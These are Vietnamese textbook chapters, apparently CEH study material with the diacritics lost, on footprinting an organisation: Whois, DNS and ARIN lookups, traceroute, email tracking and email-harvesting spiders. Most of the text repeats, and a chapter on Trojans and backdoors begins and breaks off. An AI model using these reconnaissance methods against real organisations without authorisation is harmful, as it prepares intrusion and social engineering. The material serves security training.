Footprinting c nh ngha nh nhng qu trnh to ra mt k hoch chi tit hoc bn v h thng mng ca mt t chc no . Thu thp thng tin c bit n nh l footprinting mt t chc. Footprinting bt u bng cch xc nh mc tiu h thng, ng dng, hoc v tr vt l ca mc tiu. Mt thng tin c bit n, thng tin c th v t chc c thu thp bng cch s dng phng php khng xm nhp. V d, trang web ring ca t chc c th cung cp mt th mc nhn vin hoc danh sch cc bios nhn vin, ci m c th hu ch nu hacker cn s dng mt cuc tn cng k thut x hi t c mc tiu. Mt hacker c th dng Google search hoc Yahoo! People tm kim xc nh v tr thng tin v nhng ngi nhn vin. Google search engine c th c s dng mt cch sng to thc hin vic tng hp thng tin. Vic s dng v Google searh engine ly thng tin c gi l Google hacking. http://groups.google.com c th c s dng tm kim Google newsgroup. Blog, new groups, bo chl nhng ni tt nht tm kim thng tin cng ty hay nhn vin. Cc cng ty tuyn dng c th cung cp thng tin nh nhng loi my ch hoc thit b c s h tng mt cng ty ang s dng. Cc thng tin khc thu c c th bao gm s xc nh v cc cng ngh Internet ang c s dng, h iu hnh v phn cng ang c s dng, hot ng a ch IP, a ch e-mail v s in thoi, v tp on chnh sch v th tc. Note: Thng thng, mt hacker dng 90% thi gian h s v tp hp thng tin trn mt mc tiu v 10% thi gian tin hnh vic tn cng.

2. Phng php thu thp thng tin

Tng hp thng tin c th c thc hin trong 7 bc nh trong m t ca hnh 2.1 Qu trnh footprinting c thc hin trong 2 bc u tin ca vic khm ph thng tin ban u v nh v phm vi mng. Note: Nhng bc tng hp thng tin khc c nm chng 3, Scanning and Enumeration. Mt s ngun thng thng c s dng thu thp thng tin bao gm sau y:

Domain name lookup Whois Nslookup Sam Spade

Hnh 2.1: By bc ca vic tng hp thng tin Trc khi chng ta tho lun nhng cng c ny, Hy nh rng thng tin ngun m c th mang li s giu c ca thng tin v mt mc tiu, v d nh nhng s in thoi v a ch. Thc hin nhng yu cu ca Whois, tm kim trong bng Domain Name System (DNS). Hu ht thng tin ny l d dng c c v hp php c c. Chi tit v cch hot ng DNS v c th ca bn dch DNS l ngoi phm vi ca cun sch ny v s khng c tho lun chi tit. Duy nht chi tit quan trong nht lin quan c th ti thng tin c nm trong cun sch ny. l khuyn co rng tt c cc ng c vin CEH c mt s hiu bit v DNS v cch phn tn cng vic trn Internet.
Hacking tool

Sam Spade (http://www.samspade.org) l mt website c cha mt b su tp v nhng cng c nh Whois, nslookup, v traceroute. Bi v chng c xc nh v tr trn 1 website, nhng cng c lm vic cho vi h iu hnh ny v l n v tr cung cp thng tin v 1 mc tiu t chc.

3. Phng php cnh tranh thng minh


Cnh tranh thng minh c ngha l thu thp thng tin v sn phm ca ngi cnh tranh, marketing, v nhng cng ngh. Hu ht cc cuc cnh tranh thng minh l khng xm nhp n cng ty ang c iu tra v ang c bt u trong t nhin, n c s dng so snh sn phm hoc nh bn hng v chin thut marketing hiu r hn cch m nhng i th cnh tranh ang nh v sn phm v nhng dch v ca h. Mt vi cng c tn ti cho mc ch tng hp nhng cuc cnh tranh thng minh v c th c s dng bi nhng hacker thu thp thng tin v 1 mc tiu tim n no .

4. Phng php lit k DNS

NSlookup, DNSstuff, the American Registry for Internet Number (ARIN), v Whois c th c s dng tt c t c thng tin m k c s dng thc hin DNS enumeration.

Nslookup and DNSstuff


Mt cng c mnh m bn nn lm quen l nslookup (xem hnh 2.2). Cng c ny truy vn nhng DNS server tm thng tin. N c ci t trong Unix, Linux, v h u hnh Window. Cng c hack Sam Spade bao gm nhng cng c nslookup. Hnh 2.2 Nslookup Ngoi vic tm thng tin tng hp t Whois, bn c th s dng nslookup tm b sung a ch IP cho nhng my ch v nhng host khc. S dng tn my ch c thm quyn thng tin t Whois (AUTH1.NS.NYI.NET), bn cn nhn ra a ch IP ca mail server. S bng n ca vic s dng thnh tho cc cng c lm qu trnh hack tht s d dng, nu nh bn bit nhng cng c no s dng. DNSstuff l mt cng c khc ca nhng cng c . Thay v s dng dng lnh cng c nslookup vi nhng thit b chuyn mch cng knh ca n tng hp vic ghi thng tin DNS, ch cn truy cp website http://www.dnsstuff.com, v bn c th lm mt DNS record search online, hnh 2.3 cho thy mt v d DNS record search trn http://www.eccouncil.org s dng DNSstuff.com. Nhng cuc tm kim tit l tt c nhng b danh k lc v http://www.eccuoncil.org v a ch IP ca web server. Bn thm ch c th khm ph tt c tn server v lin quan a ch IP. Note: Vic khai thc c sn ti bn bi v bn c thng tin ny c tho lun trong chng 4, System Hacking. Hnh 2.3 Bng ghi DNS tm kim v a ch http://www.eccouncil.org

5. Whois v ARIN Lookups


Whois pht trin t h iu hnh Unix, nhng n by gi c th c tm thy trong nhiu h iu hnh khc nh trong hacking toolkits v trn Internet. Ngi xc nh cng c ny phi ng k tn min s dng cho email hoc website. Uniform Resource Locator (URL), v d www.Microsoft.com, cha tn min (Microsoft.com) v 1 tn host hoc b danh(www). Internet Corporation for Asigned Names and Numbers (ICANN) yu cu ng k tn min bo m rng ch c mt cng ty duy nht s dng tn min c th . Cng c Whois truy vn vic ng k c s d liu ly thng tin lin lc v c nhn hoc t chc ng k tn min .
Hacking tool

Whois thng minh l 1 chng trnh thu thp thng tin cho php bn tm tt c thng tin gi tr v mt a ch IP, host name, hoc domain, bao gm t nc, gm c lng, tnh, thnh ph, tn ca ngi cung cp mng, administrator, v h tr k thut a ch thng tin. Whois thng minh l 1 phin bn ha ca chng trnh Whois c s. ARIN l mt c s d liu ca thng tin bao gm nhng thng tin nh ch s hu ca a ch IP tnh. C s d liu ARIN c th c truy vn vic s dng cng c Whois, v d mt v tr ti http://www.arin.net/whois. Hnh 2.4 cho thy mt ARIN Whois tm kim n http://www.yahoo.com. Ch nhng a ch, nhng e-mail, v thng tin lin h c cha tt c trong kt qu tm kim Whois ny. Thng tin ny c th c s dng bi mt hacker o c, tm ra ngi chu trch nhim cho mt a ch IP nht nh v nhng t chc s hu mc tiu h thng, hoc c th c s dng bi mt hacker c hi, thc hin mt cuc tn cng k thut mang tnh t chc x hi ln na. Bn cn c nhn thc v thng tin c sn t do tm kim c s d liu ARIN v m bo mt hacker c hi khng th s dng thng tin ny khi ng mt cuc tn cng mng. Hnh 2.4 ARIN kt qu ra cho http://www.yahoo.com

Phn tch kt qu ca Whois


Mt cch thng thng chy chng trnh Whois l kt ni ti website (v d www.networksolutions.com) v tin hnh tm kim Whois. Sau y l kt qu ca tm kim Whois cho site www.eccouncil.org: Domain ID:D81180127-LROR Domain Name:ECCOUNCIL.ORG Created On:14-Dec-2001 10:13:06 UTC Last Updated On:19-Aug-2004 03:49:53 UTC Expiration Date:14-Dec-2006 10:13:06 UTC Sponsoring Registrar:Tucows Inc. (R11-LROR) Status:OK Registrant ID:tuTv2ItRZBMNd4lA Registrant Name: John Smith Registrant Organization:International Council of E-Commerce Consultants Registrant Street1:67 Wall Street, 22nd Floor

Registrant Street2: Registrant Street3: Registrant City:New York Registrant State/Province:NY Registrant Postal Code:10005-3198 Registrant Country:US Registrant Phone:+1.2127098253 Registrant Phone Ext.: Registrant FAX:+1.2129432300 Registrant FAX Ext.: Registrant Email:forum@eccouncil.org Admin ID:tus9DYvpp5mrbLNd Admin Name: Susan Johnson Admin Organization:International Council of E-Commerce Consultants Admin Street1:67 Wall Street, 22nd Floor Admin Street2: Admin Street3: Admin City:New York Admin State/Province:NY Admin Postal Code:10005-3198 Admin Country:US Admin Phone:+1.2127098253 Admin Phone Ext.: Admin FAX:+1.2129432300

Admin FAX Ext.: Admin Email:ethan@eccouncil.org Tech ID:tuE1cgAfi1VnFkpu Tech Name:Jacob Eckel Tech Organization:International Council of E-Commerce Consultants Tech Street1:67 Wall Street, 22nd Floor Tech Street2: Tech Street3: Tech City:New York Tech State/Province:NY Tech Postal Code:10005-3198 Tech Country:US Tech Phone:+1.2127098253 Tech Phone Ext.: Tech FAX:+1.2129432300 Tech FAX Ext.: Tech Email:forum@eccouncil.org Name Server: ns1.xyz.net Name Server: ns2.xyz.net Note: Nhng tn lin lc v tn server trong sch ny c thay i. Ch 4 dng c t m. u tin ch ra mc tiu cng ty hoc ngi (tt nh nhng a ch vt l ca h, a ch e-mail, s in thoi, v hn th). Tip theo ch ra administrator hoc technical contact ( v thng tin lin lc ca h). Hai dng in m cui cng cho thy nhng tn ca domain name servers.

6. Tm kim vng a ch mng (network address range)

Mi hacker cn hiu lm th no tm vng a ch mng v subnet mask ca h thng ch. a ch IP c s dng xc nh v tr, scan, v kt ni n h thng ch. Bn c th tm a ch IP ng k trn internet vi ARIN hoc vi IANA(Internet Asigned Numbers Authority). Hacker cng cn phi tm ra bng ng i ca h thng mng mc tiu. Nhim v ny c th thc hin bng cch gi nhng gi tin thm d (bng giao thc ICMP) n a ch IP ch. Bn c th s dng cng c nh Traceroute, VisualRouter v NeoTrace cho cng vic ny. Ngoi ra, khng ch c thng tin mng ch, nhng thng tin khc cng tr nn c gi tr. V d nhng nhng a ch m h thng mng ny va truyn nhn gi tin, a ch gatewayN s c tc dng trong mt tin trnh tn cng khc.

7. S khc bit ca cc loi bng ghi DNS (DNS Record)


Di y l cc loi bng ghi DNS m chng ta thng gp. Vic nghin cu n s gip chng ta phn bit r server m chng ta ang tm c chc nng g.

A (address): nh x hostname thnh a ch IP. SOA (Start of Authoriy): Xc nh bng ghi thng tin ca DNS Server. CNAME (canonical name): Cung cp nhng tn bit danh (alias) cho tn min ang c. MX (mail exchange): Xc nh mail server cho domain SRV (service): Xc nh nhng dch v nh nhng directory service PTR (pointer): nh x a ch ip thnh hostname NS (name server): Xc nh Name Server khc cho domain

8. S dng traceroute trong k thut FootPrinting


Traceroute l gi cng c c ci t sn trong hu ht cc h iu hnh. Chc nng ca n l gi mt gi tin ICME Echo n mi hop (router hoc gateway), cho n khi n c ch. Khi gi tin ICMP gi qua mi router, trng thi gian sng (Time To Live TTL) c tr i xung mt mc. Chng ta c th m c c bao nhiu Hop m gi tin ny i qua, tc l n c ch phi qua bao nhiu router. Ngoi ra, chng ta s thu c kt qua l nhng router m gi tin i qua. Mt vn ln khi s dng Traceroute l ht thi gian i (time out), khi gi tin i qua tng la hoc router c chc nng lc gi tin. Mc d tng la s chn ng vic gi tin ICMP i qua, nhng n vn gi cho hacker mt thng bo cho bit s hin din ny, k n vi k thut vt tng la c th c s dng. Note: nhng phng php k thut ny l phn ca tn cng h thng, chng ta s c tho lun trong chng 4: System hacking.

Sam Spade v nhiu cng c hack khc bao gm 1 phin bn ca traceroute. Nhng h iu hnh Window s dng c php tracert hostname xc nh mt traceroute. Hnh 2.5 l mt v d v traceroute hin th vic theo di theo www.yahoo.com Ch trong hnh 2.5, u tin s c mt qu trnh phn gii tn min tm kim a ch cho Yahoo Web Server, v a ch ip ca server c tm thy l 68.142.226.42. Bit a ch IP ny cho php hacker thc hin qu trnh qut ton b h thng phc v cho cng vic tn cng. Chng ta s tm hiu v cc cng ngh qut (Scan) trong chng tip theo. Hnh 2.5 Kt qu ca Traceroute cho www.yahoo.com
Hacking tools

Neo trace, Visualroute, v VisualLookout l nhng cng c c giao din ha thc hin chc nng Traceroute. S dng cng c ny chng ta c th xc nh v tr ca cc router v thit b mng khc. Ngoi ra, n cn xc nh nhiu thng tin tng hp khc. Chng cung cp mt giao din trc quan cho kt qu.

9. Theo di email (E-mail Tracking)


E-mailtracking l chng trnh cho php ngi gi bit c nhng vic lm ca ngi nhn nh reads, forwards, modifies, hay deletes. Hu ht cc chng trnh E-mailtracking hot ng ti server ca tn min email. Mt file ha n bit c s dng nh km vo email gi cho ngi nhn, nhng file ny s khng c c. Khi mt hnh ng tc ng vo email, file nh km s gi thng tin li cho server cho bit hnh ng ca server. Bn thng thy nhng file ny nh km vo email vi ci tn quen thuc nh noname, noread
Hacking tool

Emailtracking pro v mailtracking.com l nhng cng c gip hacker thc hin chc nng theo di email. Khi s dng cng c, tt c nhng hot ng nh gi mail, tr li, chuyn tip, sa mail u c gi n ngi qun l. Ngi gi s nhn c nhng thng bo ny mt cch t ng.

10.

Thu thp thng tin qua Web (Web Spiders)

Web Spoder l cng ngh thu thp nhng thng tin t internet. y l cch l spammer hoc bt ai quan tm n email dng thu thp danh sch email hu dng. Web Spider s dng nhng cu php, v d nh biu tng @, xc nh email hay, k n sao chp chng vo c s d liu. D liu ny c thu thp phc v cho mt mc ch khc. Hacker c th s dng Web Spider tng hp cc loi thng tin trn internet. C mt phng php ngn chn Spider l thm file robots.txt trong thc mc gc ca website vi ni dung l danh sch cc th mc cn s bo v. Bn s tm hiu ch ny trong phn ni v Web Hacking.
Hacking tool

1st email address spider v SpiderFoot l cng c cho php chng ta thu thp email t website theo nhng tn min khc nhau. Nhng spammer s dng cng c ny tin hnh thu thp hng lot email, phc v cho mc ch spam ca h.

11.

Tng Kt
Footprinting l k thut theo di thng tin ca mc tiu. N cn c thc hin trc tin trong qu trnh tn cng. Bn c th theo di i tng qua website ca cng ty, qua nhng thng tin c chia s trn mng. Thng tin ny c chia s cng khai, khng b rng buc v php lut. L qun tr vin, bn cn bit cn nhc trc nhng thng tin , thng tin no cn gi b mt S dng cc cng c theo di thng tin i tng nh Whois, Nslookup, Traceroute. Cc k thut theo di email, thu thp tin qua website cng nn bit.

Bn cn hiu r nhng ni dung nh sau:

<<<<<<<<<<<<<<<<<<Theo V Trung Kin>>>>>>>>>>>>>>>>>>>>>

CHNG 2: FOOTPRINTING
V Trung Kin
bt u tn cng h thng, bn cn thc hin 3 bc: In du chn, Qut, Lit k. Trc khi i vo tr a tht s, bn hy hiu s lc cc cng vic ny. C th by gi chng ta s tm hiu v k thut in du chn (footprint). V d mt tn cp mun nh cp ngn hang, chng khng th bc vo v i tin, m chng s dc sc thm do cc thng tin t ngn hng . Thng tin m hn thu thp c th l tuyn ng m xe bc thp i qua, gi phn pht, s th qu, v nhng thng tin khc gip phi v thnh cng. Yu cu trn cng p dng cho mt k tn cng trn mng. Chng phi ra sc thu thp cng nhiu thng tin cng tt v mi gc cnh bo mt ca t chc. Kt qu thu c s gip cuc tn cng trt lt hn. Bng cch d theo du chn, nhng b lu tr trn internet, truy cp t xa, cngvi s hin din ca internet k tn cng c th gp nht mt cch c h thng cc thng tin t nhiu ngun khc nhau v mt t chc no .FootPrinting l g ? Footprinting l mt phn ca giai on tn cng c chun b trc v bao gm vic tch ly d liu v mi trng ca mt mc tiu v kin trc, thng thng vi mc ch tm cch xm nhp vo mi trng . Footprinting c th tit l cc l hng h thng v xc nh d dng m chng c th c khai thc. y l cch d nht cho cc hacker thu thp thng tin v nhng h thng my tnh v cc cng ty m h thuc v. Mc ch ca giai on chun b ny l tm hiu cng nhiu cng tt nh bn c th v mt h thng, kh nng truy cp t xa ca n, port v dch v ca mnh, v bt k kha cnh c th v bo mt ca n.

1.Phm tr ca Footprinting
Footprinting c nh ngha nh nhng qu trnh to ra mt k hoch chi tit hoc bn v h thng mng ca mt t chc no . Thu thp thng tin c bit n nh l footprinting mt t chc. Footprinting bt u bng cch xc nh mc tiu h thng, ng dng, hoc v tr vt l ca mc tiu. Mt thng tin c bit n, thng tin c th v t chc c thu thpbng cch s dng phng php khng xm nhp. V d, trang web ring ca t chc c th cung cp mt th mc nhn vin hoc danh sch cc bios nhn vin, ci m c th hu ch nu hacker cn s dng mt cuc tn cng k thut x hi t c mc tiu. Mt hacker c th dng Google search hoc Yahoo! People tm kim xc nh v tr thng tin v nhng ngi nhn vin. Google search engine c th c s dng mt cch sng to thc hin vic tng hp thng tin. Vic s dng v Google searh engine ly thng tin c gi l Google hacking. http://groups.google.com c th c s dng tm kim Google newsgroup. Blog, new groups, bo chl nhng ni tt nht tm kim thng tin cng ty hay nhn vin. Cc cng ty tuyn dng c th cung cp thng tin nh nhng loi my ch hoc thit b c s h tng mt cng ty ang s dng. Cc thng tin khc thu c c th bao gm s xc nh v cc cng ngh Internet ang c s dng, h iu hnh v phn cng ang c s dng, hot ng a ch IP, a ch e-mail v s in thoi, v tp on chnh sch v th tc. Note: Thng thng, mt hacker dng 90% thi gian h s v tp hp thng tin trn mt mc tiu v 10% thi gian tin hnh vic tn cng.

2.Phng php thu thp thng tin


Tng hp thng tin c th c thc hin trong 7 bc nh trong m t ca hnh 2.1 Qu trnh footprinting c thc hin trong 2 bc u tin ca vic khm ph thng tin ban u v nh v phm vi mng. Note: Nhng bc tng hp thng tin khc c nm chng 3, Scanning and Enumeration. Mt s ngun thng thng c s dng thu thp thng tin bao gm sau y: Domain name lookup Whois Nslookup

Sam Spade Hnh 2.1: By bc ca vic tng hp thng tin Trc khi chng ta tho lun nhng cng c ny, Hy nh rng thng tin ngun m c th mang li s giu c ca thng tin v mt mc tiu, v d nh nhng s in thoi v a ch. Thc hin nhng yu cu ca Whois, tm kim trong bng Domain Name System (DNS). Hu ht thng tin ny l d dng c c v hp php c c. Chi tit v cch hot ng DNS v c th ca bn dch DNS l ngoi phm vi ca cun sch ny v s khng c tho lun chi tit. Duy nht chi tit quan trong nht lin quan c th ti thng tin c nm trong cun sch ny. l khuyn co rng tt c cc ng c vin CEH c mt s hiu bit v DNS v cch phn tn cng vic trn Internet.
Hacking tool

Sam Spade (http://www.samspade.org) l mt website c cha mt b su tp v nhng cng c nh Whois, nslookup, v traceroute. Bi v chng c xc nh v tr trn 1 website, nhng cng c lm vic cho vi h iu hnh ny v l n v tr cung cp thng tin v 1 mc tiu t chc.

3.Phng php cnh tranh thng minh


Cnh tranh thng minh c ngha l thu thp thng tin v sn phm ca ngi cnh tranh, marketing, v nhng cng ngh. Hu ht cc cuc cnh tranh thng minh l khng xm nhp n cng ty ang c iu tra v ang c bt u trong t nhin, n c s dng so snh sn phm hoc nh bn hng v chin thut marketing hiu r hn cch m nhng i th cnh tranh ang nh v sn phm v nhng dch v ca h. Mt vi cng c tn ti cho mc ch tng hp nhng cuc cnh tranh thng minh v c th c s dng bi nhng hacker thu thp thng tin v 1 mc tiu tim n no .

4.Phng php lit k DNS


NSlookup, DNSstuff, the American Registry for Internet Number (ARIN), v Whois c th c s dng tt c t c thng tin m k c s dng thc hin DNS enumeration.

Nslookup and DNSstuff


Mt cng c mnh m bn nn lm quen l nslookup (xem hnh 2.2). Cng c ny truy vn nhng DNS server tm thng tin. N c ci t trong Unix, Linux, v h u hnh Window. Cng c hack Sam Spade bao gm nhng cng c nslookup. Hnh 2.2 Nslookup

Ngoi vic tm thng tin tng hp t Whois, bn c th s dng nslookup tm b sung a ch IP cho nhng my ch v nhng host khc. S dng tn my ch c thm quyn thng tin t Whois (AUTH1.NS.NYI.NET), bn cn nhn ra a ch IP ca mail server. S bng n ca vic s dng thnh tho cc cng c lm qu trnh hack tht s d dng, nu nh bn bit nhng cng c no s dng. DNSstuff l mt cng c khc ca nhng cng c . Thay v s dng dng lnh cng c nslookup vi nhng thit b chuyn mch cng knh ca n tng hp vic ghi thng tin DNS, ch cn truy cp website http://www.dnsstuff.com, v bn c th lm mt DNS record search online, hnh 2.3 cho thy mt v d DNS record search trn http://www.eccouncil.org s dng DNSstuff.com. Nhng cuc tm kim tit l tt c nhng b danh k lc v http://www.eccuoncil.org v a ch IP ca web server. Bn thm ch c th khm ph tt c tn server v lin quan a ch IP. Note: Vic khai thc c sn ti bn bi v bn c thng tin ny c tho lun trong chng 4, System Hacking. Hnh 2.3 Bng ghi DNS tm kim v a ch http://www.eccouncil.org

5.Whois v ARIN Lookups


Whois pht trin t h iu hnh Unix, nhng n by gi c th c tm thy trong nhiu h iu hnh khc nh trong hacking toolkits v trn Internet. Ngi xc nh cng c ny phi ng k tn min s dng cho email hoc website. Uniform Resource Locator (URL), v d www.Microsoft.com, cha tn min (Microsoft.com) v 1 tn host hoc b danh(www). Internet Corporation for Asigned Names and Numbers (ICANN) yu cu ng k tn min bo m rng ch c mt cng ty duy nht s dng tn min c th . Cng c Whois truy vn vic ng k c s d liu ly thng tin lin lc v c nhn hoc t chc ng k tn min .
Hacking tool

Whois thng minh l 1 chng trnh thu thp thng tin cho php bn tm tt c thng tin gi tr v mt a ch IP, host name, hoc domain, bao gm t nc, gm c lng, tnh, thnh ph, tn ca ngi cung cp mng, administrator, v h tr k thut a ch thng tin. Whois thng minh l 1 phin bn ha ca chng trnh Whois c s. ARIN l mt c s d liu ca thng tin bao gm nhng thng tin nh ch s hu ca a ch IP tnh. C s d liu ARIN c th c truy vn vic s dng cng c Whois, v d mt v tr ti http://www.arin.net/whois. Hnh 2.4 cho thy mt ARIN Whois tm kim n http://www.yahoo.com. Ch nhng a ch, nhng e-mail, v thng tin lin h c cha tt c trong kt qu tm kim Whois ny. Thng tin ny c th c s dng bi mt hacker o c, tm ra ngi chu trch nhim cho mt a ch IP nht nh v nhng t chc s hu mc tiu h thng, hoc c th c s dng bi mt hacker c hi, thc hin mt cuc tn cng k thut mang tnh t chc x hi

ln na. Bn cn c nhn thc v thng tin c sn t do tm kim c s d liu ARIN v m bo mt hacker c hi khng th s dng thng tin ny khi ng mt cuc tn cng mng. Hnh 2.4 ARIN kt qu ra cho http://www.yahoo.com

Phn tch kt qu ca Whois


Mt cch thng thng chy chng trnh Whois l kt ni ti website (v d www.networksolutions.com) v tin hnh tm kim Whois. Sau y l kt qu ca tm kim Whois cho site www.eccouncil.org: Domain ID:D81180127-LROR Domain Name:ECCOUNCIL.ORG Created On:14-Dec-2001 10:13:06 UTC Last Updated On:19-Aug-2004 03:49:53 UTC Expiration Date:14-Dec-2006 10:13:06 UTC Sponsoring Registrar:Tucows Inc. (R11-LROR) Status:OK Registrant ID:tuTv2ItRZBMNd4lA Registrant Name: John Smith Registrant Organization:International Council of E-Commerce Consultants Registrant Street1:67 Wall Street, 22nd Floor Registrant Street2: Registrant Street3: Registrant City:New York Registrant State/Province:NY Registrant Postal Code:10005-3198 Registrant Country:US

Registrant Phone:+1.2127098253 Registrant Phone Ext.: Registrant FAX:+1.2129432300 Registrant FAX Ext.: Registrant Email:forum@eccouncil.org Admin ID:tus9DYvpp5mrbLNd Admin Name: Susan Johnson Admin Organization:International Council of E-Commerce Consultants Admin Street1:67 Wall Street, 22nd Floor Admin Street2: Admin Street3: Admin City:New York Admin State/Province:NY Admin Postal Code:10005-3198 Admin Country:US Admin Phone:+1.2127098253 Admin Phone Ext.: Admin FAX:+1.2129432300 Admin FAX Ext.: Admin Email:ethan@eccouncil.org Tech ID:tuE1cgAfi1VnFkpu Tech Name:Jacob Eckel Tech Organization:International Council of E-Commerce Consultants

Tech Street1:67 Wall Street, 22nd Floor Tech Street2: Tech Street3: Tech City:New York Tech State/Province:NY Tech Postal Code:10005-3198 Tech Country:US Tech Phone:+1.2127098253 Tech Phone Ext.: Tech FAX:+1.2129432300 Tech FAX Ext.: Tech Email:forum@eccouncil.org Name Server: ns1.xyz.net Name Server: ns2.xyz.net

Note: Nhng tn lin lc v tn server trong sch ny c thay i. Ch 4 dng c t m. u tin ch ra mc tiu cng ty hoc ngi (tt nh nhng a ch vt l ca h, a ch e-mail, s in thoi, v hn th). Tip theo ch ra administrator hoc technical contact ( v thng tin lin lc ca h). Hai dng in m cui cng cho thy nhng tn ca domain name servers.

6.Tm kim vng a ch mng (network address range)


Mi hacker cn hiu lm th no tm vng a ch mng v subnet mask ca h thng ch. a ch IP c s dng xc nh v tr, scan, v kt ni n h thng ch. Bn c th tm a ch IP ng k trn internet vi ARIN hoc vi IANA(Internet Asigned Numbers Authority).

Hacker cng cn phi tm ra bng ng i ca h thng mng mc tiu. Nhim v ny c th thc hin bng cch gi nhng gi tin thm d (bng giao thc ICMP) n a ch IP ch. Bn c th s dng cng c nh Traceroute, VisualRouter v NeoTrace cho cng vic ny. Ngoi ra, khng ch c thng tin mng ch, nhng thng tin khc cng tr nn c gi tr. V d nhng nhng a ch m h thng mng ny va truyn nhn gi tin, a ch gatewayN s c tc dng trong mt tin trnh tn cng khc.

7.S khc bit ca cc loi bng ghi DNS (DNS Record)


Di y l cc loi bng ghi DNS m chng ta thng gp. Vic nghin cu n s gip chng ta phn bit r server m chng ta ang tm c chc nng g. A (address): nh x hostname thnh a ch IP. SOA (Start of Authoriy): Xc nh bng ghi thng tin ca DNS Server. CNAME (canonical name): Cung cp nhng tn bit danh (alias) cho tn min ang c. MX (mail exchange): Xc nh mail server cho domain SRV (service): Xc nh nhng dch v nh nhng directory service PTR (pointer): nh x a ch ip thnh hostname NS (name server): Xc nh Name Server khc cho domain

8.S dng traceroute trong k thut FootPrinting


Traceroute l gi cng c c ci t sn trong hu ht cc h iu hnh. Chc nng ca n l gi mt gi tin ICME Echo n mi hop (router hoc gateway), cho n khi n c ch. Khi gi tin ICMP gi qua mi router, trng thi gian sng (Time To Live TTL) c tr i xung mt mc. Chng ta c th m c c bao nhiu Hop m gi tin ny i qua, tc l n c ch phi qua bao nhiu router. Ngoi ra, chng ta s thu c kt qua l nhng router m gi tin i qua. Mt vn ln khi s dng Traceroute l ht thi gian i (time out), khi gi tin i qua tng la hoc router c chc nng lc gi tin. Mc d tng la s chn ng vic gi tin ICMP i qua, nhng n vn gi cho hacker mt thng bo cho bit s hin din ny, k n vi k thut vt tng la c th c s dng. Note: nhng phng php k thut ny l phn ca tn cng h thng, chng ta s c tho lun trong chng 4: System hacking.

Sam Spade v nhiu cng c hack khc bao gm 1 phin bn ca traceroute. Nhng h iu hnh Window s dng c php tracert hostname xc nh mt traceroute. Hnh 2.5 l mt v d v traceroute hin th vic theo di theo www.yahoo.com Ch trong hnh 2.5, u tin s c mt qu trnh phn gii tn min tm kim a ch cho Yahoo Web Server, v a ch ip ca server c tm thy l 68.142.226.42. Bit a ch IP ny cho php hacker thc hin qu trnh qut ton b h thng phc v cho cng vic tn cng. Chng ta s tm hiu v cc cng ngh qut (Scan) trong chng tip theo. Hnh 2.5 Kt qu ca Traceroute cho www.yahoo.com
Hacking tools

Neo trace, Visualroute, v VisualLookout l nhng cng c c giao din ha thc hin chc nng Traceroute. S dng cng c ny chng ta c th xc nh v tr ca cc router v thit b mng khc. Ngoi ra, n cn xc nh nhiu thng tin tng hp khc. Chng cung cp mt giao din trc quan cho kt qu.

9.Theo di email (E-mail Tracking)


E-mailtracking l chng trnh cho php ngi gi bit c nhng vic lm ca ngi nhn nh reads, forwards, modifies, hay deletes. Hu ht cc chng trnh E-mailtracking hot ng ti server ca tn min email. Mt file ha n bit c s dng nh km vo email gi cho ngi nhn, nhng file ny s khng c c. Khi mt hnh ng tc ng vo email, file nh km s gi thng tin li cho server cho bit hnh ng ca server. Bn thng thy nhng file ny nh km vo email vi ci tn quen thuc nh noname, noread
Hacking tool

Emailtracking pro v mailtracking.com l nhng cng c gip hacker thc hin chc nng theo di email. Khi s dng cng c, tt c nhng hot ng nh gi mail, tr li, chuyn tip, sa mail u c gi n ngi qun l. Ngi gi s nhn c nhng thng bo ny mt cch t ng.

10.

Thu thp thng tin qua Web (Web Spiders)

Web Spoder l cng ngh thu thp nhng thng tin t internet. y l cch l spammer hoc bt ai quan tm n email dng thu thp danh sch email hu dng. Web Spider s dng nhng cu php, v d nh biu tng @, xc nh email hay, k n sao chp chng vo c s d liu. D liu ny c thu thp phc v cho mt mc ch khc. Hacker c th s dng Web Spider tng hp cc loi thng tin trn internet. C mt phng php ngn chn Spider l thm file robots.txt trong thc mc gc ca website vi ni dung l danh sch cc th mc cn s bo v. Bn s tm hiu ch ny trong phn ni v Web Hacking.
Hacking tool

1st email address spider v SpiderFoot l cng c cho php chng ta thu thp email t website theo nhng tn min khc nhau. Nhng spammer s dng cng c ny tin hnh thu thp hng lot email, phc v cho mc ch spam ca h.

11.

Tng Kt

Bn cn hiu r nhng ni dung nh sau: Footprinting l k thut theo di thng tin ca mc tiu. N cn c thc hin trc tin trong qu trnh tn cng. Bn c th theo di i tng qua website ca cng ty, qua nhng thng tin c chia s trn mng. Thng tin ny c chia s cng khai, khng b rng buc v php lut. L qun tr vin, bn cn bit cn nhc trc nhng thng tin , thng tin no cn gi b mt S dng cc cng c theo di thng tin i tng nh Whois, Nslookup, Traceroute. Cc k thut theo di email, thu thp tin qua website cng nn bit.

////////////////

CHNG 9: TROJANS, BACKDOORS


Trojan v Backdoor l hai phng thc m hacker dng xm nhp bt hp php h thng mc tiu. Chng c nhng trng thi khc nhau, nhng c mt im chung l: Cc hacker phi ci t mt chng trnh khc trn my tnh mc tiu, hoc l ngi dng b nh la ci t chng trnh Trojan hoc Backdoor trn my tnh ca h. Trojan v backdoor l nhng cng c hu ch cho hacker chn chnh (hacker m trng), v nhng nh qun tr h thng, h s dng cng c ny kim tra my tnh v h thng mng.

Virus v Worm c th dng ph hoi my tnh v h thng mng nh Trojan v Backdoor. Trong thc t, c nhiu loi virus mang theo c Trojan vo h thng, sau khi hacker li mt backdoor. Trong chng ny, chng ta s tho lun s ging v khc nhau ca Tronjan, Backdoor, Virus, v Worm. Tt c chng u c gi chung l chng trnh c hi hay m c hi (Malicious Code hoc Malware). y l vn quan trng ca hacker chn chnh, bi v n l cch chung nht c s ng dung ha h thng.

1. Malware V Cc Vn C Bn
Trc khi i vo ni dung chnh ca bi hc, chng ta nn dnh thi gian hiu Malware l g, v cc dnh hot ng ca chng.

Malware l g?

Khi nim rng nht c cp n l Malware hay Malicious code, c gi l M c hi trong cc phn sau ca ti liu ny. M c hi c nh ngha l mt chng trnh (program) c chn mt cch b mt vo h thng vi mc ch lm tn hi n tnh b mt, tnh ton vn hoc tnh sn sng ca h thng Xa nay, chng ta thng gom tt c nhng chng trnh no c nguy hi n my tnh vo mt ci tn gi l Virus. iu ny tht oan c cho virus, v n ch l mt phn nh trong cc chng trnh gy hi m thi. nh ngha Malware s bao hm rt nhiu th loi m chng ta vn quen gi chung l virus nh: worm, trojan, spy-ware, thm ch l virus hoc cc b cng c tn cng h thng m cc hacker thng s dng nh: backdoor, rootkit, keylogger,

Phn loi Malware


